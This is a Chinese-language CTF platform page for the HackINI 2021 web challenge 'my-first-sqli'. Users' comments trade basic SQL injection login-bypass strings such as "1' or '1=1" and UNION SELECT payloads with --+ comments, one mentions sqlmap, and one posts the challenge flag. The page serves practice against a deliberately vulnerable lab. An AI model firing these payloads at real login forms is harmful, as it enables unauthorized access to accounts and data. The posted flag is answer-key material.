my-first-sqliWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 6267
提  示:
描  述:
My First SQL injection!!
评论
yituoshi 2年前

Half the truth is often a big lie:shellmates{SQLi_goeS_BrrRR}

回复 0

2200394635 2年前

直接最简单的 1' or '1=1

回复 2

wclc 2年前

为什么注释要用--+才可以,我用的#爆不出来

回复 0
adminhrp 2年前

可能是版本或者sql应用不同,这里用--也可以实现,2个玩意都是sql注释

回复 0

18583024570 2年前

判读闭合符就能出来

回复 0

Y4n9 2年前

1'union select 1,2 --+,密码随便写,通过union select联合查询,看有无回显点

回复 0

hesh 2年前

1' union select * from users order by 2 --+ 密码框随便填一个

回复 1

战斗到底 2年前

sqlmap

回复 0

简单一点点 2年前

1' union select 1,2--+ 就出结果了,还没搞明白为啥。。。

回复 2

Am0s 2年前

简简单单~~

回复 0

愿你手拥幸福 2年前

把这道题想的太正常了,导致一下子给我大脑CPU干烧了,才发现这题没做啥防护

回复 0

WriteUp

image
thb143

0 金币

评分(10)

解题动态

木木夕 攻破了该题 19分钟前
Zhengzanmei 攻破了该题 1小时前
gongyy 攻破了该题 3小时前
IlIlIlIllll 攻破了该题 4小时前
LGuo 攻破了该题 16小时前
雪子且飞机 攻破了该题 22小时前
潇洒哥 攻破了该题 1天前
111222 攻破了该题 1天前
彭彭 攻破了该题 1天前
lileafy 攻破了该题 1天前
yy_hc 攻破了该题 1天前
leyilea 攻破了该题 1天前
66666ctfxr 攻破了该题 1天前
18769061395 攻破了该题 1天前
202508940137 攻破了该题 1天前
16645732892 攻破了该题 1天前
forever12345 攻破了该题 1天前
hiderush 攻破了该题 1天前
15206540508 攻破了该题 1天前
miniliu 攻破了该题 1天前
问题反馈